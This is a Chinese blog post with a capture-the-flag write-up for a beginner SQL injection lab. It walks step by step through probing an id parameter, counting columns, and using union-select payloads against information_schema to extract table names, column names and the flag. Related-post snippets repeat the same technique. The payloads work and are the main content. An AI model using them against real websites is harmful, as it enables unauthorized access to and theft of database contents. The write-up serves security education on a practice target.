[第一章 web入门]SQL注入-1

最新推荐文章于 2024-03-14 23:38:12 发布
最新推荐文章于 2024-03-14 23:38:12 发布
阅读量1.9k 收藏 8
点赞数 1
文章标签: unctf sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51902218/article/details/119915005
版权

目录

1. 观察 

2. 判断  

3. 判断字段数  

4. 显位 

5. 爆库

6. 爆表

7. 爆列

8. 爆值

1. 观察 

 

首先,打开靶场引入眼帘只有两个比较显目的地方,url和一篇笔记内容  

很明显,url中id部分存在注入点 

2. 判断  

id=2

所以肯定id是注入点 

输入(注释符发现#无效)

id=1 and 1 = 1--+

id=1 and 1 = 2--+

页面无改变,所以不是数字型注入

输入

id=1' and 1 = 1--+

id=1' and 1 = 2--+

页面第二个出现逻辑报错  

所以为字符型注入 

3. 判断字段数  

id=1' order by 3 --+

id=1' order by 4 --+

 

 

所以字段数为3

4. 显位 

2,3的位置可以显位 

5. 爆库

 id=0' union select 1,2,group_concat(schema_name) from (information_schema.schemata)

得到所有数据库名:information_schema,mysql,note,performance_schema

 id=0' union select 1,2,database()--+

得到当前数据库名:note 

6. 爆表

id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

得到当前数据库的表:fl4g,notes

7. 爆列

 id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fl4g'--+

得到fl4g表的列名:fllllag

所以flag很有可能就在这里面了

8. 爆值

 id=0' union select 1,2,group_concat(fllllag) from (fl4g)--+

得到flag:n1book{union_select_is_so_cool} 

花墩墩
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
WEB入门——SQL注入(一)
HasntStartIsOver的博客
06-03 1250
简单的SQL注入
Web入门SQL注入(一)
qq_51459823的博客
11-12 619
昨天装好了工具,今天开始入门Web吧!就以Burpsuite官方靶场作为学习Web的起点 如下知识为刷Burpsite官方靶场所得,部分为自我思考,如有错误,希望各位提出: 首先我们先了解一下: 什么是 SQL 注入 (SQLi)? SQL 注入是一种 Web 安全漏洞,允许攻击者干扰应用程序对其数据库进行的查询。它通常允许攻击者查看他们通常无法检索的数据。这可能包括属于其他用户的数据,或应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除这些数据,从而导致应用程序的内容或行为发生
BUUCTF [第一章 web入门]SQL注入-1
m0_49025459的博客
04-08 4926
题目 先找注入点,看一url 发现了 ?id=1测试一下是字符型注入还是数字型注入 分别对url进行如下修改,发现页面没有变化,证明不是字符型注入 id=1 and 1 = 1--+ id=1 and 1 = 2--+ 分别对url进行如下修改 id=1' and 1 = 1--+ id=1' and 1 = 2--+ 在更改url为第二个的时候,发现页面出现错误,证明存在字符型注入点 判断字符段的数量 id=1' order by 3 --+ id=1' order ...
Web入门Sql注入(二)
qq_51459823的博客
11-16 1097
通过触发 SQL 错误来诱导条件响应 在前面的示例中,假设应用程序执行相同的 SQL 查询,但根据查询是否返回任何数据,行为没有任何不同。前面的技术将不起作用,因为注入不同的布尔条件对应用程序的响应没有影响。 在这种情况下,根据注入的条件,通常可以通过有条件地触发 SQL 错误来诱导应用程序返回条件响应。这涉及修改查询,以便在条件为真时会导致数据库错误,但如果条件为假则不会。很多时候,数据库抛出的未处理的错误会导致应用程序的响应(例如错误消息)出现一些差异,从而使我们能够推断注入条件的真实性。 要查看
[第一章 web入门]sql注入-1
06-28
SQL注入是一种常见的攻击方式,攻击者通过在Web应用程序中注入恶意的SQL语句,从而获取敏感信息或者执行非法操作。SQL注入攻击的原理是利用Web应用程序没有对用户输入的数据进行充分的过滤和验证,从而导致恶意SQL...
CTF---Web---SQL注入---11---注入列的选择与id的值
qq_22160557的博客
08-01 813
文章目录前言一、题目描述二、解题步骤1、尝试列数2、爆表的两种方式3、爆列、字段三、总结 前言 题目分类: CTFWebSQL注入—11—注入列的选择与id的值 一、题目描述 题目:SQL注入 二、解题步骤 1、尝试列数 Step1:尝试列数,1 union select 1,2,3,4# 列数为4列 1 union select 1,2,database(),4# 数据库名为:inject_05 2、爆表的两种方式 Step2:爆表 -1 union select 1,(select grou
[第一章 web入门]SQL注入-1BUUCTF
最新发布
observer的博客
03-14 1054
[第一章 web入门]SQL注入-1BUUCTF
N1BOOK第三关摸鱼:[第一章 web入门]SQL注入-1
weixin_45571987的博客
11-30 3280
BUUCTF:[第一章 web入门]SQL注入-1寻找注入点尝试注入测试有几个回显开始查库查表查字段flag 寻找注入点   由域名和题目的名字可以知道咱们这道题需要尝试对它进行SQL注入http://554314db-43b4-4f9d-b9bb-b6089db353a1.node3.buuoj.cn/index.php?id=1 ?id=1’ and 1=2 页面出现错误,说明存在注入点 id 尝试注入 测试有几个回显 ?id=1’ order by3 --+ 页面正常 ?id=1’ order
N1Book [第一章 web入门]-sql注入
m0_61368098的博客
08-20 783
重要的数据库:   information_schema   包含MySQL中所有的数据库信息 重要的表:   schemata   mysql中所有数据库的信息   schema_name  所有数据库名   tables   数据库表中的信息   table_schema 记录数据库名    table_name  记录数据表名 columns   列信息 column_name  字段名
 第一章SQL注入基础--1.1Web应用架构分析&1.2 SQLi注入环境搭建
n0d_xy的博客
04-13 406
简介:文章分为三部分:1、概要;2详细的思维导图;3、详细的解说。 描述:概要包括该文介绍的知识点;详细的思维导图更好地理清思路,方便记忆,但对于有些对于作者比较基础的内容不会有详细的解释,建议主动了解;详细的解说作者会根据思维导图的纲要添加代码语句等内容,有时间会添加具体操作,具体步骤,操作结果等内容,添加需要注意的Tips(蓝色字体怎样)。 Tips:这些都是作者学习过的内容,文字、思维导...
[第一章 web入门]SQL注入-1 题目分析与详解
2302_79800344的博客
02-25 1156
本题考查SQL注入基础。
[第一章 web入门]SQL注入
chbeloved的博客
07-20 451
[第一章 web入门]SQL注入-1 打开界面是这样,sql注入嘛那就hackbar里面动手,先查有几列,用order by 1一直到order by 4 不存在回显。 说明就三列。现在查询库,提一下前面的id=1需要改成=0或者负数让前面id那块报错才能继续查下去(个人理解)。 这里找到库的名字是note 下一步查表名,下面俩种写法都ok 表找到了 下一步找列 得到fllllag这个列,就要开始爆值。得到flag。 总结就是一步一步,爆库,表,列,值。 ...
《从0到1》[第一章 web入门]SQL注入
m0_63253040的博客
03-21 190
进入环境 url里有?id=1,存在sql注入,当id=4时有提示 左上角会有查询语句的显示,我们直接开始注入 先看字段数,到4时无回显 看回显位置 爆数据库:note 爆数据表:fl4g,notes 爆字段:fllllag 查数据:n1book{union_select_is_so_cool} ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值